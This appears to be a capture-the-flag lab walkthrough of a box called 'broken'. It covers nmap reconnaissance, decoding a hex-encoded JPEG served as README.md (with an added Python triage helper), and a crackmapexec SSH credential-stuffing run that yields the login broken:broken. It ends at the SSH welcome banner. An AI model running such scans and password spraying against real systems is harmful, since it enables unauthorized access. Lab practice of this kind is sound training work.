broken
Scan as usual
Host discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.92.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:16 EST
Nmap scan report for 192.168.92.1
Host is up (0.00065s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00036s latency).
MAC Address: 00:50:56:E9:BE:0B (VMware)
Nmap scan report for 192.168.92.145
Host is up (0.00076s latency).
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00069s latency).
MAC Address: 00:50:56:E0:A6:00 (VMware)
Nmap scan report for 192.168.92.130
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.18 seconds
Port scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:17 EST
Nmap scan report for 192.168.92.145
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 17.95 seconds
TCP scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:18 EST
Nmap scan report for 192.168.92.145
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 39:5e:bf:8a:49:a3:13:fa:0d:34:b8:db:26:57:79:a7 (RSA)
| 256 20:d7:72:be:30:6a:27:14:e1:e6:c2:16:7a:40:c8:52 (ECDSA)
|_ 256 84:a0:9a:59:61:2a:b7:1e:dd:6e:da:3b:91:f9:a0:c6 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 55K 2019-08-09 01:20 README.md
| 1.1K 2019-08-09 01:21 gallery.html
| 259K 2019-08-09 01:11 img_5terre.jpg
| 114K 2019-08-09 01:11 img_forest.jpg
| 663K 2019-08-09 01:11 img_lights.jpg
| 8.4K 2019-08-09 01:11 img_mountains.jpg
|_
MAC Address: 00:0C:29:27:E2:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.97 seconds
UDP scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:19 EST
Nmap scan report for 192.168.92.145
Host is up (0.00078s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 33.03 seconds
Script scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:20 EST
Stats: 0:02:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 08:23 (0:00:02 remaining)
Stats: 0:02:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 08:23 (0:00:02 remaining)
Nmap scan report for 192.168.92.145
Host is up (0.00040s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.92.145:80/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 335.17 seconds
Nothing of value here.
Normal directory scan
Nothing found. Strange.
Go back over the port scan once more.
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/README.md
--2023-12-04 08:35:18-- http://192.168.92.145/README.md
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:56594 (55K)
正在保存至: “README.md”
README.md 100%[======================================================================>] 55.27K --.-KB/s 用时 0s
2023-12-04 08:35:18 (113 MB/s) - 已保存 “README.md” [56594/56594])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ file README.md
README.md: CSV ASCII text
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/^[[200~img_5terre.jpg~
zsh: bad pattern: http://192.168.92.145/^[[200~img_5terre.jpg~
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_5terre.jpg
--2023-12-04 08:36:42-- http://192.168.92.145/img_5terre.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:265415 (259K) [image/jpeg]
正在保存至: “img_5terre.jpg”
img_5terre.jpg 100%[======================================================================>] 259.19K --.-KB/s 用时 0.004s
2023-12-04 08:36:42 (63.8 MB/s) - 已保存 “img_5terre.jpg” [265415/265415])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_forest.jpg
--2023-12-04 08:45:36-- http://192.168.92.145/img_forest.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:116737 (114K) [image/jpeg]
正在保存至: “img_forest.jpg”
img_forest.jpg 100%[======================================================================>] 114.00K --.-KB/s 用时 0.001s
2023-12-04 08:45:36 (83.1 MB/s) - 已保存 “img_forest.jpg” [116737/116737])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/mg_lights.jpg
--2023-12-04 08:45:53-- http://192.168.92.145/mg_lights.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 404 Not Found
2023-12-04 08:45:53 错误 404:Not Found。
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_lights.jpg
--2023-12-04 08:46:02-- http://192.168.92.145/img_lights.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:678909 (663K) [image/jpeg]
正在保存至: “img_lights.jpg”
img_lights.jpg 100%[======================================================================>] 663.00K --.-KB/s 用时 0.009s
2023-12-04 08:46:02 (74.7 MB/s) - 已保存 “img_lights.jpg” [678909/678909])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_mountains.jpg
--2023-12-04 08:46:18-- http://192.168.92.145/img_mountains.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:8555 (8.4K) [image/jpeg]
正在保存至: “img_mountains.jpg”
img_mountains.jpg 100%[======================================================================>] 8.35K --.-KB/s 用时 0s
2023-12-04 08:46:18 (89.6 MB/s) - 已保存 “img_mountains.jpg” [8555/8555])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ ls
img_5terre.jpg img_forest.jpg img_lights.jpg img_mountains.jpg README.md
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ exiftool
Syntax: exiftool [OPTIONS] FILE
Consult the exiftool documentation for a full list of options.
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ exiftool *.jpg
======== img_5terre.jpg
ExifTool Version Number : 12.67
File Name : img_5terre.jpg
Directory : .
File Size : 265 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:36:42-05:00
File Inode Change Date/Time : 2023:12:04 08:36:42-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Image Width : 1200
Image Height : 900
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:2 (2 1)
Image Size : 1200x900
Megapixels : 1.1
======== img_forest.jpg
ExifTool Version Number : 12.67
File Name : img_forest.jpg
Directory : .
File Size : 117 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:45:36-05:00
File Inode Change Date/Time : 2023:12:04 08:45:36-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 750
Image Height : 425
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 750x425
Megapixels : 0.319
======== img_lights.jpg
ExifTool Version Number : 12.67
File Name : img_lights.jpg
Directory : .
File Size : 679 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:46:02-05:00
File Inode Change Date/Time : 2023:12:04 08:46:02-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Profile CMM Type : Little CMS
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2012:01:25 03:41:57
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : c2
Profile Copyright : FB
Media White Point : 0.9642 1 0.82491
Media Black Point : 0.01205 0.0125 0.01031
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Image Width : 2988
Image Height : 1680
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 2988x1680
Megapixels : 5.0
======== img_mountains.jpg
ExifTool Version Number : 12.67
File Name : img_mountains.jpg
Directory : .
File Size : 8.6 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:46:18-05:00
File Inode Change Date/Time : 2023:12:04 08:46:18-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 314
Image Height : 160
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 314x160
Megapixels : 0.050
4 image files read
Nothing useful inside the images.
Convert the md file (hex text) back into a binary:
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ xxd -r -ps README.md > README.bin
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ strings README.bin | head -n 20
JFIF
Compressed by jpeg-recompress
"*%%*424DD\
"*%%*424DD\
'X"U
}Y}IS>
p "#%0@P
4jgAL
~^+#5V
k&qo!
uMWn
d1Z%
%7D#
R1mB_d
PvPj
z1}fZ%(*%
]kDA>E
J*;iV
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ cp README.bin README.jpeg
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ ls
img_5terre.jpg img_forest.jpg img_lights.jpg img_mountains.jpg README.bin README.jpeg README.md
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ xdg-open README.jpeg
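The README.md on this box is a JPEG serialised as plain hex text, which is why `file` reported it as CSV/ASCII and `xxd -r -ps` recovered the image. The triage helper below, an added example that is not part of the original write-up, recognises that pattern automatically and identifies the decoded blob by its magic bytes; the sample input is a constructed hex string of a minimal JFIF header.

```python
"""Detect a text file that is really a hex dump of a binary and decode it,
then identify the result by its magic bytes. Added example for this
write-up; the sample input below is constructed, not taken from the box."""
import re

# Magic-byte prefixes worth recognising during triage. JPEG/JFIF is the case
# that README.md on this box turned out to be.
MAGIC = {
    b"\xff\xd8\xff": "JPEG image",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"PK\x03\x04": "ZIP archive",
    b"\x7fELF": "ELF executable",
    b"%PDF": "PDF document",
}

# Hex digits and whitespace only, i.e. the plain output of `xxd -ps`.
HEX_RE = re.compile(rb"^[0-9a-fA-F\s]+$")


def looks_like_hex_dump(data: bytes) -> bool:
    """True if the whole file is hex digits (plus whitespace) with an even
    digit count; `file` tends to call such content CSV or ASCII text."""
    if not data.strip() or not HEX_RE.match(data):
        return False
    digits = re.sub(rb"\s", b"", data)
    return len(digits) % 2 == 0


def decode_hex_dump(data: bytes) -> bytes:
    """Equivalent of `xxd -r -ps`: strip whitespace and decode byte pairs."""
    digits = re.sub(rb"\s", b"", data)
    return bytes.fromhex(digits.decode("ascii"))


def identify(blob: bytes) -> str:
    """Name the decoded content from its leading magic bytes."""
    for magic, name in MAGIC.items():
        if blob.startswith(magic):
            return name
    return "unknown"


def triage(data: bytes) -> dict:
    """Report whether a suspicious text file is a hex dump and, if so,
    what it decodes to and how large the decoded payload is."""
    if not looks_like_hex_dump(data):
        return {"hex_dump": False, "decoded_type": None, "size": len(data)}
    blob = decode_hex_dump(data)
    return {"hex_dump": True, "decoded_type": identify(blob), "size": len(blob)}


# Constructed sample: hex text of a 20-byte JPEG/JFIF header, the same shape
# as the served README.md (the 'JFIF' string shows up in `strings` once
# the hex is decoded).
SAMPLE_HEX = b"ffd8ffe000104a46494600010100000100010000\n"

if __name__ == "__main__":
    print(triage(SAMPLE_HEX))
    print(triage(b"# a real markdown file\n"))
```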
Since there is nothing here and port 22 is still open, try credential stuffing.
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ cat creds
clinque
terre
black
forest
northen
lights
mountains
bob
broken
avrajamcohen
avrajamcohen.ac
Build a wordlist from the information gathered so far.
Try credential stuffing
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ sudo crackmapexec ssh 192.168.92.145 -u creds -p creds --continue-on-success
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SSH protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing MSSQL protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH 192.168.92.145 22 192.168.92.145 [*] SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [+] broken:broken
SSH 192.168.92.145 22 192.168.92.145 [-] broken:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:avrajamcohen.ac Authentication failed.
Luckily one pair succeeds:
SSH 192.168.92.145 22 192.168.92.145 [+] broken:broken

SSH connection
[[sudo timedatectl]]
Connected successfully
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ sudo ssh broken@192.168.92.145
[sudo] kali 的密码:
The authenticity of host '192.168.92.145 (192.168.92.145)' can't be established.
ED25519 key fingerprint is SHA256:2rSjxvkij5hWypyT/706pdaI6YAB0AOIXa7kVnMBDZs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.145' (ED25519) to the list of known hosts.
broken@192.168.92.145's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)
* Documentation: https://help.ubuntu.com/
762 packages can be updated.
458 updates are security updates.
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
